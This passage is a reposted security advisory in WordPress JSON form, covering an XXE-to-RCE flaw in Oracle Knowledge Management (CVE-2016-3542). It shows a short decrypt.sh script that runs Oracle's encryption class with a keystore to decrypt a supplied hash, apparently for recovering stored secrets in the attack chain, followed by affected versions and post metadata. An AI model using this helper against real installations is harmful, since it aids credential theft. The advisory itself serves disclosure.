seconds] -->  <\/p>\n<p><strong>decrypt.sh<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fc8817891766\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/bin\/sh  if [ &#8220;$#&#8221; -ne 1 ]; then      echo &#8220;(!) Usage: $0 [hash]&#8221;  else      java -classpath &#8220;infra_encryption.jar:oraclepki.jar:osdt_core.jar:osdt_cert.jar:commons-codec-1.3.jar&#8221; -DKEYSTORE_LOCATION=&#8221;keystore&#8221; com.inquira.infra.security.OKResourceEncryption $1  fi<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc8817891766-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc8817891766-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc8817891766-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc8817891766-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc8817891766-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc8817891766-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc8817891766-1\"><span class=\"crayon-p\">#!\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc8817891766-2\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;$#&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">ne<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">then<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc8817891766-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(!) Usage: $0 [hash]&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc8817891766-4\"><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc8817891766-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">classpath<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;infra_encryption.jar:oraclepki.jar:osdt_core.jar:osdt_cert.jar:commons-codec-1.3.jar&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">DKEYSTORE_LOCATION<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;keystore&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">inquira<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">infra<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">security<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">OKResourceEncryption<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc8817891766-6\"><span class=\"crayon-v\">fi<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p><strong>CVE Details<\/strong><br \/> <a href=\"https:\/\/web.nvd.nist.gov\/view\/vuln\/detail?vulnId=CVE-2016-3542\" target=\"_blank\">CVE-2016-3542<\/a><\/p>\n<p><strong>Affected Products<\/strong><br \/> Oracle Knowledge Management versions 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3052\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process-300x176.png\"\/><\/p>\n<p><strong>Credit to Author: Maor Schwartz| Date: Sun, 19 Mar 2017 08:05:05 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle&#8217;s InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content. &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3052\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Oracle Knowledge Management XXE Leading to a RCE<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10755,11680,11681,11682],"class_list":["post-7034","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-commentary","tag-directory-traversal","tag-external-entity-xxe","tag-remote-code-execution"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7034","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7034"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7034\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7034"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7034"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}